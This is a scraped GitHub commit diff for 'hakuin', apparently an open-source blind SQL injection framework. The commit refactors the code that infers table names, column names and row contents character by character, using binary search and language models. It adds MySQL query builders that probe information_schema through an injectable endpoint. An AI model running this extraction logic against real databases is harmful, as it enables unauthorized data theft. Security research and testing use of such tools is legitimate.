1
0
mirror of https://github.com/pruzko/hakuin synced 2024-10-18 09:48:06 +02:00

major refactoring (DBMS, collectors) & unicode support

This commit is contained in:
Jakub Pruzinec 2023-10-04 19:13:22 +08:00
parent 042fa5df91
commit 9932d8dacd
17 changed files with 1214 additions and 622 deletions

3
.gitignore vendored

@ -162,4 +162,5 @@ cython_debug/
#.idea/ #.idea/
# Hakuin # Hakuin
tmp/ tmp/
demos/

@ -1,7 +1,6 @@
import hakuin import hakuin
import hakuin.search_algorithms as search_alg import hakuin.search_algorithms as search_alg
import hakuin.collectors as collect import hakuin.collectors as collect
from hakuin.utils import CHARSET_SCHEMA
@ -33,24 +32,23 @@ class Extractor:
ctx = search_alg.Context(None, None, None, None) ctx = search_alg.Context(None, None, None, None)
n_rows = search_alg.IntExponentialSearch( n_rows = search_alg.IntExponentialBinarySearch(
self.requester, requester=self.requester,
self.dbms.count_tables, query_cb=self.dbms.TablesQueries.rows_count,
upper=8 upper=8,
find_range=True,
).run(ctx) ).run(ctx)
if strategy == 'binary': if strategy == 'binary':
return collect.BinaryTextCollector( return collect.BinaryTextCollector(
self.requester, requester=self.requester,
self.dbms.char_tables, queries=self.dbms.TablesQueries,
charset=CHARSET_SCHEMA,
).run(ctx, n_rows) ).run(ctx, n_rows)
else: else:
return collect.ModelTextCollector( return collect.ModelTextCollector(
self.requester, requester=self.requester,
self.dbms.char_tables, queries=self.dbms.TablesQueries,
model=hakuin.get_model_tables(), model=hakuin.get_model_tables(),
charset=CHARSET_SCHEMA,
).run(ctx, n_rows) ).run(ctx, n_rows)
@ -70,24 +68,23 @@ class Extractor:
ctx = search_alg.Context(table, None, None, None) ctx = search_alg.Context(table, None, None, None)
n_rows = search_alg.IntExponentialSearch( n_rows = search_alg.IntExponentialBinarySearch(
self.requester, requester=self.requester,
self.dbms.count_columns, query_cb=self.dbms.ColumnsQueries.rows_count,
upper=8 upper=8,
find_range=True,
).run(ctx) ).run(ctx)
if strategy == 'binary': if strategy == 'binary':
return collect.BinaryTextCollector( return collect.BinaryTextCollector(
self.requester, requester=self.requester,
self.dbms.char_columns, queries=self.dbms.ColumnsQueries,
charset=CHARSET_SCHEMA,
).run(ctx, n_rows) ).run(ctx, n_rows)
else: else:
return collect.ModelTextCollector( return collect.ModelTextCollector(
self.requester, requester=self.requester,
self.dbms.char_columns, queries=self.dbms.ColumnsQueries,
model=hakuin.get_model_columns(), model=hakuin.get_model_columns(),
charset=CHARSET_SCHEMA,
).run(ctx, n_rows) ).run(ctx, n_rows)
@ -104,15 +101,15 @@ class Extractor:
ctx = search_alg.Context(table, column, None, None) ctx = search_alg.Context(table, column, None, None)
d_type = search_alg.BinarySearch( d_type = search_alg.BinarySearch(
self.requester, requester=self.requester,
self.dbms.meta_type, query_cb=self.dbms.MetaQueries.column_data_type,
values=self.dbms.DATA_TYPES, values=self.dbms.DATA_TYPES,
).run(ctx) ).run(ctx)
return { return {
'type': d_type, 'type': d_type,
'nullable': self.requester.request(ctx, self.dbms.meta_is_nullable(ctx)), 'nullable': self.requester.request(ctx, self.dbms.MetaQueries.column_is_nullable(ctx)),
'pk': self.requester.request(ctx, self.dbms.meta_is_pk(ctx)), 'pk': self.requester.request(ctx, self.dbms.MetaQueries.column_is_pk(ctx)),
} }
@ -140,7 +137,7 @@ class Extractor:
return schema return schema
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows=None, n_rows_guess=128): def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
'''Extracts text column. '''Extracts text column.
Params: Params:
@ -152,7 +149,6 @@ class Extractor:
'dynamic' for dynamically choosing the best search strategy and 'dynamic' for dynamically choosing the best search strategy and
opportunistically guessing strings opportunistically guessing strings
charset (list|None): list of possible characters charset (list|None): list of possible characters
n_rows (int|None): number of rows
n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
Returns: Returns:
@ -162,32 +158,30 @@ class Extractor:
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}' assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
ctx = search_alg.Context(table, column, None, None) ctx = search_alg.Context(table, column, None, None)
n_rows = search_alg.IntExponentialBinarySearch(
if n_rows is None: requester=self.requester,
n_rows = search_alg.IntExponentialSearch( query_cb=self.dbms.RowsQueries.rows_count,
self.requester, upper=n_rows_guess,
self.dbms.count_rows, find_range=True,
upper=n_rows_guess ).run(ctx)
).run(ctx)
if strategy == 'binary': if strategy == 'binary':
return collect.BinaryTextCollector( return collect.BinaryTextCollector(
self.requester, requester=self.requester,
self.dbms.char_rows, queries=self.dbms.RowsQueries,
charset=charset, charset=charset,
).run(ctx, n_rows) ).run(ctx, n_rows)
elif strategy in ['unigram', 'fivegram']: elif strategy in ['unigram', 'fivegram']:
ngram = 1 if strategy == 'unigram' else 5 ngram = 1 if strategy == 'unigram' else 5
return collect.AdaptiveTextCollector( return collect.AdaptiveTextCollector(
self.requester, requester=self.requester,
self.dbms.char_rows, queries=self.dbms.RowsQueries,
model=hakuin.Model(ngram), model=hakuin.Model(ngram),
charset=charset, charset=charset,
).run(ctx, n_rows) ).run(ctx, n_rows)
else: else:
return collect.DynamicTextCollector( return collect.DynamicTextCollector(
self.requester, requester=self.requester,
self.dbms.char_rows, queries=self.dbms.RowsQueries,
self.dbms.string_rows,
charset=charset, charset=charset,
).run(ctx, n_rows) ).run(ctx, n_rows)

@ -26,8 +26,9 @@ class Model:
@property @property
def order(self): def order(self):
assert self.model if self.model:
return self.model.order return self.model.order
return None
def load(self, file): def load(self, file):
@ -49,7 +50,7 @@ class Model:
Returns: Returns:
dict: likelihood distribution dict: likelihood distribution
''' '''
context = context[-(self.order - 1):] context = [] if self.order == 1 else context[-(self.order - 1):]
while context: while context:
scores = self._scores(context) scores = self._scores(context)

@ -3,284 +3,544 @@ from abc import ABCMeta, abstractmethod
from collections import Counter from collections import Counter
import hakuin import hakuin
from hakuin.utils import tokenize, CHARSET_ASCII, EOS from hakuin.utils import tokenize, CHARSET_ASCII, EOS, ASCII_MAX, UNICODE_MAX
from hakuin.utils.huffman import make_tree from hakuin.utils.huffman import make_tree
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch from hakuin.search_algorithms import Context, BinarySearch, TreeSearch, IntExponentialBinarySearch
class Collector(metaclass=ABCMeta): class Collector(metaclass=ABCMeta):
'''Abstract class for collectors. Collectors repeatidly run '''Abstract class for collectors. Collectors repeatidly run
search algorithms to infer column rows. search algorithms to extract column rows.
''' '''
def __init__(self, requester, query_cb): def __init__(self, requester, queries):
'''Constructor. '''Constructor.
Params: Params:
requester (Requester): Requester instance requester (Requester): Requester instance
query_cb (function): query construction function queries (UniformQueries): injection queries
''' '''
self.requester = requester self.requester = requester
self.query_cb = query_cb self.queries = queries
def run(self, ctx, n_rows): def run(self, ctx, n_rows, *args, **kwargs):
'''Run collection. '''Collects the whole column.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
n_rows (int): number of rows in column n_rows (int): number of rows in column
Returns: Returns:
list: column rows list: column rows
''' '''
logging.info(f'Inferring "{ctx.table}.{ctx.column}"...') logging.info(f'Inferring "{ctx.table}.{ctx.column}"')
data = [] data = []
for row in range(n_rows): for row in range(n_rows):
ctx = Context(ctx.table, ctx.column, row, None) ctx = Context(ctx.table, ctx.column, row, None)
res = self._collect_row(ctx) res = self.collect_row(ctx, *args, **kwargs)
data.append(res) data.append(res)
logging.info(f'({row + 1}/{n_rows}) inferred: {res}') logging.info(f'({row + 1}/{n_rows}) "{ctx.table}.{ctx.column}": {res}')
return data return data
@abstractmethod @abstractmethod
def _collect_row(self, ctx): def collect_row(self, ctx, *args, **kwargs):
'''Collects a row.
Params:
ctx (Context): extraction context
Returns:
value: single row
'''
raise NotImplementedError() raise NotImplementedError()
class TextCollector(Collector): class TextCollector(Collector):
'''Collector for text columns.''' '''Collector for text columns.'''
def _collect_row(self, ctx): def __init__(self, requester, queries, charset=None):
'''Constructor.
Params:
requester (Requester): Requester instance
queries (UniformQueries): injection queries
charset (list|None): list of possible characters, None for default ASCII
'''
super().__init__(requester, queries)
self.charset = charset if charset is not None else CHARSET_ASCII
if EOS not in self.charset:
self.charset.append(EOS)
def run(self, ctx, n_rows):
'''Collects the whole column.
Params:
ctx (Context): extraction context
n_rows (int): number of rows in column
Returns:
list: column rows
'''
rows_are_ascii = self.check_rows_are_ascii(ctx)
return super().run(ctx, n_rows, rows_are_ascii)
def collect_row(self, ctx, rows_are_ascii):
'''Collects a row.
Params:
ctx (Context): extraction context
rows_are_ascii (bool): ASCII flag for all rows in column
Returns:
string: single row
'''
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
ctx.s = '' ctx.s = ''
while True: while True:
c = self._collect_char(ctx) c = self.collect_char(ctx, row_is_ascii)
if c == EOS: if c == EOS:
return ctx.s return ctx.s
ctx.s += c ctx.s += c
@abstractmethod @abstractmethod
def _collect_char(self, ctx): def collect_char(self, ctx, row_is_ascii):
'''Collects a character.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
Returns:
string: single character
'''
raise NotImplementedError() raise NotImplementedError()
def check_rows_are_ascii(self, ctx):
'''Finds out whether all rows in column are ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.rows_are_ascii(ctx)
return self.requester.request(ctx, query)
def check_row_is_ascii(self, ctx):
'''Finds out whether current row is ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.row_is_ascii(ctx)
return self.requester.request(ctx, query)
def check_char_is_ascii(self, ctx):
'''Finds out whether current character is ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.char_is_ascii(ctx)
return self.requester.request(ctx, query)
class BinaryTextCollector(TextCollector): class BinaryTextCollector(TextCollector):
'''Binary search text collector''' '''Binary search text collector'''
def __init__(self, requester, query_cb, charset=None): def collect_char(self, ctx, row_is_ascii):
'''Constructor. '''Collects a character.
Params: Params:
requester (Requester): Requester instance ctx (Context): extraction context
query_cb (function): query construction function row_is_ascii (bool): row ASCII flag
charset (list|None): list of possible characters
Returns: Returns:
list: column rows string: single character
''' '''
super().__init__(requester, query_cb) return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
self.charset = charset if charset else CHARSET_ASCII
def _collect_char(self, ctx): def emulate_char(self, ctx, row_is_ascii, correct):
return BinarySearch( '''Emulates character collection without sending requests.
self.requester,
self.query_cb, Params:
values=self.charset, ctx (Context): extraction context
).run(ctx) row_is_ascii (bool): row ASCII flag
correct (str): correct character
Returns:
int: number of requests necessary
'''
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
total_queries = 0
# custom charset or ASCII
if self.charset is not CHARSET_ASCII or row_is_ascii or self._check_or_emulate_char_is_ascii(ctx, correct):
search_alg = BinarySearch(
requester=self.requester,
query_cb=self.queries.char,
values=self.charset,
correct=correct,
)
res = search_alg.run(ctx)
total_queries += search_alg.n_queries
if res is not None:
return res, total_queries
# Unicode
correct_ord = ord(correct) if correct is not None else correct
search_alg = IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.queries.char_unicode,
lower=ASCII_MAX + 1,
upper=UNICODE_MAX + 1,
find_range=False,
correct=correct_ord,
)
res = search_alg.run(ctx)
total_queries += search_alg.n_queries
return chr(res), total_queries
def _check_or_emulate_char_is_ascii(self, ctx, correct):
if correct is None:
return self.check_char_is_ascii(ctx)
return correct.isascii()
class ModelTextCollector(TextCollector): class ModelTextCollector(TextCollector):
'''Language model-based text collector.''' '''Language model-based text collector.'''
def __init__(self, requester, query_cb, model, charset=None): def __init__(self, requester, queries, model, charset=None):
'''Constructor. '''Constructor.
Params: Params:
requester (Requester): Requester instance requester (Requester): Requester instance
query_cb (function): query construction function queries (UniformQueries): injection queries
model (Model): language model model (Model): language model
charset (list|None): list of possible characters charset (list|None): list of possible characters
Returns: Returns:
list: column rows list: column rows
''' '''
super().__init__(requester, query_cb) super().__init__(requester, queries, charset)
self.model = model self.model = model
self.charset = charset if charset else CHARSET_ASCII self.binary_collector = BinaryTextCollector(
requester=self.requester,
queries=self.queries,
charset=self.charset,
)
def _collect_char(self, ctx): def collect_char(self, ctx, row_is_ascii):
'''Collects a character.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
Returns:
string: single character
'''
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
def emulate_char(self, ctx, row_is_ascii, correct):
'''Emulates character collection without sending requests.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
correct (str): correct character
Returns:
int: number of requests necessary
'''
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
n_queries_model = 0
model_ctx = tokenize(ctx.s, add_eos=False) model_ctx = tokenize(ctx.s, add_eos=False)
scores = self.model.scores(context=model_ctx) scores = self.model.scores(context=model_ctx)
c = TreeSearch( search_alg = TreeSearch(
self.requester, requester=self.requester,
self.query_cb, query_cb=self.queries.char,
tree=make_tree(scores), tree=make_tree(scores),
).run(ctx) correct=correct,
)
res = search_alg.run(ctx)
n_queries_model = search_alg.n_queries
if c is not None: if res is not None:
return c return res, n_queries_model
charset = list(set(self.charset).difference(set(scores))) res, n_queries_binary = self.binary_collector._collect_or_emulate_char(ctx, row_is_ascii, correct)
return BinarySearch( return res, n_queries_model + n_queries_binary
self.requester,
self.query_cb,
values=self.charset,
).run(ctx)
class AdaptiveTextCollector(ModelTextCollector): class AdaptiveTextCollector(ModelTextCollector):
'''Same as ModelTextCollector but adapts the model.''' '''Same as ModelTextCollector but adapts the model.'''
def _collect_char(self, ctx): def collect_char(self, ctx):
c = super()._collect_char(ctx) c = super().collect_char(ctx, correct)
self.model.fit_correct_char(c, partial_str=ctx.s) self.model.fit_correct_char(c, partial_str=ctx.s)
return c return c
class DynamicTextStats:
'''Helper class of DynamicTextCollector to keep track of statistical information.'''
def __init__(self):
self.str_len_mean = 0.0
self.n_strings = 0
self._rpc = {
'binary': {'mean': 0.0, 'hist': []},
'unigram': {'mean': 0.0, 'hist': []},
'fivegram': {'mean': 0.0, 'hist': []},
}
def update_str(self, s):
self.n_strings += 1
self.str_len_mean = (self.str_len_mean * (self.n_strings - 1) + len(s)) / self.n_strings
def update_rpc(self, strategy, n_queries):
rpc = self._rpc[strategy]
rpc['hist'].append(n_queries)
rpc['hist'] = rpc['hist'][-100:]
rpc['mean'] = sum(rpc['hist']) / len(rpc['hist'])
def rpc(self, strategy):
return self._rpc[strategy]['mean']
def best_strategy(self):
return min(self._rpc, key=lambda strategy: self.rpc(strategy))
class DynamicTextCollector(TextCollector): class DynamicTextCollector(TextCollector):
'''Dynamic text collector. The collector keeps statistical information (RPC) '''Dynamic text collector. The collector keeps statistical information (RPC)
for several strategies (binary search, unigram, and five-gram) and dynamically for several strategies (binary search, unigram, and five-gram) and dynamically
chooses the best one. In addition, it uses the statistical information to chooses the best one. In addition, it uses the statistical information to
identify when guessing whole strings is likely to succeed and then uses identify when guessing whole strings is likely to succeed and then uses
previously inferred strings to make the guesses. previously inferred strings to make the guesses.
'''
def __init__(self, requester, queries, charset=None):
'''Constructor.
Attributes: Params:
GUESS_TH (float): success probability threshold necessary to make guesses requester (Requester): Requester instance
GUESS_SCORE_TH (float): minimal necessary probability to be included in guess tree queries (UniformQueries): injection queries
charset (list|None): list of possible characters
Other Attributes:
model_unigram (Model): adaptive unigram model
model_fivegram (Model): adaptive five-gram model
guess_collector (StringGuessCollector): collector for guessing
'''
super().__init__(requester, queries, charset)
self.binary_collector = BinaryTextCollector(
requester=self.requester,
queries=self.queries,
charset=self.charset,
)
self.unigram_collector = ModelTextCollector(
requester=self.requester,
queries=self.queries,
model=hakuin.Model(1),
charset=self.charset,
)
self.fivegram_collector = ModelTextCollector(
requester=self.requester,
queries=self.queries,
model=hakuin.Model(5),
charset=self.charset,
)
self.guess_collector = StringGuessingCollector(
requester=self.requester,
queries=self.queries,
)
self.stats = DynamicTextStats()
def collect_row(self, ctx, rows_are_ascii):
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
s = self._collect_string(ctx, row_is_ascii)
self.guess_collector.model.fit_single(s, context=[])
self.stats.update_str(s)
return s
def _collect_string(self, ctx, row_is_ascii):
'''Tries to guess strings or extracts them on per-character basis if guessing fails'''
exp_c = self.stats.str_len_mean * self.stats.rpc(self.stats.best_strategy())
correct_str = self.guess_collector.collect_row(ctx, exp_c)
if correct_str is not None:
self._update_stats_str(ctx, row_is_ascii, correct_str)
self.unigram_collector.model.fit_data([correct_str])
self.fivegram_collector.model.fit_data([correct_str])
return correct_str
return self._collect_string_per_char(ctx, row_is_ascii)
def _collect_string_per_char(self, ctx, row_is_ascii):
ctx.s = ''
while True:
c = self.collect_char(ctx, row_is_ascii)
self._update_stats(ctx, row_is_ascii, c)
self.unigram_collector.model.fit_correct_char(c, partial_str=ctx.s)
self.fivegram_collector.model.fit_correct_char(c, partial_str=ctx.s)
if c == EOS:
return ctx.s
ctx.s += c
return ctx.s
def collect_char(self, ctx, row_is_ascii):
'''Chooses the best strategy and uses it to infer a character.'''
best = self.stats.best_strategy()
# print(f'b: {self.stats.rpc("binary")}, u: {self.stats.rpc("unigram")}, f: {self.stats.rpc("fivegram")}')
if best == 'binary':
return self.binary_collector.collect_char(ctx, row_is_ascii)
elif best == 'unigram':
return self.unigram_collector.collect_char(ctx, row_is_ascii)
else:
return self.fivegram_collector.collect_char(ctx, row_is_ascii)
def _update_stats(self, ctx, row_is_ascii, correct):
'''Emulates all strategies without sending requests and updates the statistical information.'''
collectors = (
('binary', self.binary_collector),
('unigram', self.unigram_collector),
('fivegram', self.fivegram_collector),
)
for strategy, collector in collectors:
n_queries = collector.emulate_char(ctx, row_is_ascii, correct)
self.stats.update_rpc(strategy, n_queries)
def _update_stats_str(self, ctx, row_is_ascii, correct_str):
'''Like _update_stats but for whole strings.'''
ctx.s = ''
for c in correct_str:
self._update_stats(ctx, row_is_ascii, c)
ctx.s += c
class StringGuessingCollector(Collector):
'''String guessing collector. The collector keeps track of previously extracted
strings and opportunistically tries to guess new strings.
''' '''
GUESS_TH = 0.5 GUESS_TH = 0.5
GUESS_SCORE_TH = 0.01 GUESS_SCORE_TH = 0.01
def __init__(self, requester, query_char_cb, query_string_cb, charset=None): def __init__(self, requester, queries):
'''Constructor. '''Constructor.
Params: Params:
requester (Requester): Requester instance requester (Requester): Requester instance
query_char_cb (function): query construction function for searching characters queries (UniformQueries): injection queries
query_string_cb (function): query construction function for searching strings
charset (list|None): list of possible characters
Other Attributes: Other Attributes:
model_guess: adaptive string-based model for guessing GUESS_TH (float): minimal threshold necessary to start guessing
model_unigram: adaptive unigram model GUESS_SCORE_TH (float): minimal threshold for strings to be eligible for guessing
model_fivegram: adaptive five-gram model model (Model): adaptive string-based model for guessing
''' '''
self.requester = requester super().__init__(requester, queries)
self.query_char_cb = query_char_cb self.model = hakuin.Model(1)
self.query_string_cb = query_string_cb
self.charset = charset if charset else CHARSET_ASCII
self.model_guess = hakuin.Model(1)
self.model_unigram = hakuin.Model(1)
self.model_fivegram = hakuin.Model(5)
self._stats = {
'rpc': {
'binary': {'avg': 0.0, 'hist': []},
'unigram': {'avg': 0.0, 'hist': []},
'fivegram': {'avg': 0.0, 'hist': []},
},
'avg_len': 0.0,
'n_strings': 0,
}
def _collect_row(self, ctx): def collect_row(self, ctx, exp_alt=None):
s = self._collect_string(ctx) '''Tries to construct a guessing Huffman tree and searches it in case of success.
self.model_guess.fit_single(s, context=[])
self._stats['n_strings'] += 1 Params:
ctx (Context): extraction context
exp_alt (float|None): expectation for alternative extraction method or None if it does not exist
total = self._stats['avg_len'] * (self._stats['n_strings'] - 1) + len(s) Returns:
self._stats['avg_len'] = total / self._stats['n_strings'] string|None: guessed string or None if skipped or failed
return s
def _collect_string(self, ctx):
'''Identifies if guessings strings is likely to succeed and if yes, it makes guesses.
If guessing does not take place or fails, it proceeds with per-character inference.
''' '''
correct_str = self._try_guessing(ctx) exp_alt = exp_alt if exp_alt is not None else float('inf')
tree = self._get_guess_tree(ctx, exp_alt)
if correct_str is not None:
self._update_stats_str(ctx, correct_str)
self.model_unigram.fit_data([correct_str])
self.model_fivegram.fit_data([correct_str])
return correct_str
ctx.s = ''
while True:
c = self._collect_char(ctx)
self._update_stats(ctx, c)
self.model_unigram.fit_correct_char(c, partial_str=ctx.s)
self.model_fivegram.fit_correct_char(c, partial_str=ctx.s)
if c == EOS:
return ctx.s
ctx.s += c
def _collect_char(self, ctx):
'''Chooses the best strategy and uses it to infer a character.'''
searched_space = set()
c = self._get_strategy(ctx, searched_space, self._best_strategy()).run(ctx)
if c is None:
c = self._get_strategy(ctx, searched_space, 'binary').run(ctx)
return c
def _try_guessing(self, ctx):
'''Tries to construct a guessing Huffman tree and searches it in case of success.'''
tree = self._get_guess_tree(ctx)
return TreeSearch( return TreeSearch(
self.requester, requester=self.requester,
self.query_string_cb, query_cb=self.queries.string,
tree=tree, tree=tree,
).run(ctx) ).run(ctx)
def _get_guess_tree(self, ctx): def _get_guess_tree(self, ctx, exp_alt):
'''Identifies, whether string guessing is likely to succeed and if so, '''Identifies, whether string guessing is likely to succeed and if so,
it constructs a Huffman tree from previously inferred strings. it constructs a Huffman tree from previously inferred strings.
Params:
ctx (Context): extraction context
exp_alt (float): expectation for alternative extraction method
Returns: Returns:
utils.huffman.Node|None: Huffman tree constructed from previously inferred utils.huffman.Node|None: Huffman tree constructed from previously inferred strings that are
strings that are likely to succeed or None if no such strings were found likely to succeed or None if no such strings were found
''' '''
# Expectation for per-character inference:
# exp_c = avg_len * best_strategy_rpc
exp_c = self._stats['avg_len'] * self._stats['rpc'][self._best_strategy()]['avg']
# Iteratively compute the best expectation "best_exp_g" by progressively inserting guess # Iteratively compute the best expectation "best_exp_g" by progressively inserting guess
# strings into a candidate guess set "guesses" and computing their expectation "exp_g". # strings into a candidate guess set "guesses" and computing their expectation "exp_g".
# The iteration stops when the minimal "exp_g" is found. # The iteration stops when the minimal "exp_g" is found.
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_c) # exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_alt)
guesses = {} guesses = {}
prob_g = 0.0 prob_g = 0.0
best_prob_g = 0.0 best_prob_g = 0.0
best_exp_g = float('inf') best_exp_g = float('inf')
best_tree = None best_tree = None
scores = self.model_guess.scores(context=[]) scores = self.model.scores(context=[])
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model_guess.count(k, []) > 1} scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model.count(k, []) > 1}
for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True): for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True):
guesses[guess] = score guesses[guess] = score
tree = make_tree(guesses) tree = make_tree(guesses)
tree_cost = tree.search_cost() tree_cost = tree.search_cost()
prob_g += score prob_g += score
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_c) exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
if exp_g > best_exp_g: if exp_g > best_exp_g:
break break
@ -289,83 +549,7 @@ class DynamicTextCollector(TextCollector):
best_exp_g = exp_g best_exp_g = exp_g
best_tree = tree best_tree = tree
if best_exp_g > exp_c or best_prob_g < self.GUESS_TH: if best_exp_g <= exp_alt and best_prob_g > self.GUESS_TH:
return None return best_tree
return best_tree return None
def _best_strategy(self):
'''Returns the name of the best strategy.'''
return min(self._stats['rpc'], key=lambda strategy: self._stats['rpc'][strategy]['avg'])
def _update_stats(self, ctx, correct):
'''Emulates all strategies without sending any requests and updates the
statistical information.
'''
for strategy in self._stats['rpc']:
searched_space = set()
search_alg = self._get_strategy(ctx, searched_space, strategy, correct)
res = search_alg.run(ctx)
n_queries = search_alg.n_queries
if res is None:
binary_search = self._get_strategy(ctx, searched_space, 'binary', correct)
binary_search.run(ctx)
n_queries += binary_search.n_queries
m = self._stats['rpc'][strategy]
m['hist'].append(n_queries)
m['hist'] = m['hist'][-100:]
m['avg'] = sum(m['hist']) / len(m['hist'])
def _update_stats_str(self, ctx, correct_str):
'''Like _update_stats but for whole strings'''
ctx.s = ''
for c in correct_str:
self._update_stats(ctx, c)
ctx.s += c
def _get_strategy(self, ctx, searched_space, strategy, correct=None):
'''Builds search algorithm configured to search appropriate space.
Params:
ctx (Context): inference context
searched_space (list): list of values that have already been searched
strategy (str): strategy ('binary', 'unigram', 'fivegram')
correct (str|None): correct character
Returns:
SearchAlgorithm: configured search algorithm
'''
if strategy == 'binary':
charset = list(set(self.charset).difference(searched_space))
return BinarySearch(
self.requester,
self.query_char_cb,
values=self.charset,
correct=correct,
)
elif strategy == 'unigram':
scores = self.model_unigram.scores(context=[])
searched_space.union(set(scores))
return TreeSearch(
self.requester,
self.query_char_cb,
tree=make_tree(scores),
correct=correct,
)
else:
model_ctx = tokenize(ctx.s, add_eos=False)
model_ctx = model_ctx[-(self.model_fivegram.order - 1):]
scores = self.model_fivegram.scores(context=model_ctx)
searched_space.union(set(scores))
return TreeSearch(
self.requester,
self.query_char_cb,
tree=make_tree(scores),
correct=correct,
)

@ -3,54 +3,75 @@ from abc import ABCMeta, abstractmethod
class DBMS(metaclass=ABCMeta): class Queries(metaclass=ABCMeta):
RE_NORM = re.compile(r'[ \n]+') '''Class for constructing SQL queries.'''
_RE_NORMALIZE = re.compile(r'[ \n]+')
DATA_TYPES = []
@staticmethod @staticmethod
def normalize(s): def normalize(s):
return DBMS.RE_NORM.sub(' ', s).strip() return Queries._RE_NORMALIZE.sub(' ', s).strip()
@staticmethod
def hex(s):
return s.encode("utf-8").hex()
class MetaQueries(Queries):
'''Interface for queries that infer DB metadata.'''
@abstractmethod @abstractmethod
def count_rows(self, ctx, n): def column_data_type(self, ctx, values): raise NotImplementedError()
raise NotImplementedError()
@abstractmethod @abstractmethod
def count_tables(self, ctx, n): def column_is_nullable(self, ctx): raise NotImplementedError()
raise NotImplementedError()
@abstractmethod @abstractmethod
def count_columns(self, ctx, n): def column_is_pk(self, ctx): raise NotImplementedError()
raise NotImplementedError()
@abstractmethod
def meta_type(self, ctx, values):
raise NotImplementedError()
@abstractmethod
def meta_is_nullable(self, ctx):
raise NotImplementedError()
class UniformQueries(Queries):
'''Interface for queries that can be unified.'''
@abstractmethod @abstractmethod
def meta_is_pk(self, ctx): def rows_count(self, ctx): raise NotImplementedError()
raise NotImplementedError() @abstractmethod
def rows_are_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def row_is_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def char_is_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def char(self, ctx): raise NotImplementedError()
@abstractmethod
def char_unicode(self, ctx): raise NotImplementedError()
@abstractmethod
def string(self, ctx, values): raise NotImplementedError()
@abstractmethod
def char_rows(self, ctx, values):
raise NotImplementedError()
@abstractmethod
def char_tables(self, ctx, values):
raise NotImplementedError()
@abstractmethod class DBMS(metaclass=ABCMeta):
def char_columns(self, ctx, values): '''Database Management System (DBMS) interface.
raise NotImplementedError()
@abstractmethod Attributes:
def string_rows(self, ctx, values): DATA_TYPES (list): all data types available
raise NotImplementedError() MetaQueries (MetaQueries): queries of metadata extraction
TablesQueries (UniformQueries): queries for table names extraction
ColumnsQueries (UniformQueries): queries for column names extraction
RowsQueries (UniformQueries): queries for rows extraction
'''
_RE_ESCAPE = re.compile(r'[a-zA-Z0-9_#@]+')
DATA_TYPES = []
MetaQueries = None
TablesQueries = None
ColumnsQueries = None
RowsQueries = None
@staticmethod
def escape(s):
if DBMS._RE_ESCAPE.match(s):
return s
assert ']' not in s, f'Cannot escape "{s}"'
return f'[{s}]'

@ -1,9 +1,298 @@
from hakuin.utils import EOS from hakuin.utils import EOS, ASCII_MAX
from .DBMS import DBMS from .DBMS import DBMS, MetaQueries, UniformQueries
class MySQLMetaQueries(MetaQueries):
def column_data_type(self, ctx, values):
values = [f"'{v}'" for v in values]
query = f'''
SELECT lower(DATA_TYPE) in ({','.join(values)})
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_nullable(self, ctx):
query = f'''
SELECT IS_NULLABLE='YES'
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_pk(self, ctx):
query = f'''
SELECT COLUMN_KEY='PRI'
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
class MySQLTablesQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
# min() simulates the logical ALL operator here
query = f'''
SELECT min(TABLE_NAME = CONVERT(TABLE_NAME using ASCII))
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT TABLE_NAME = CONVERT(TABLE_NAME using ASCII)
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
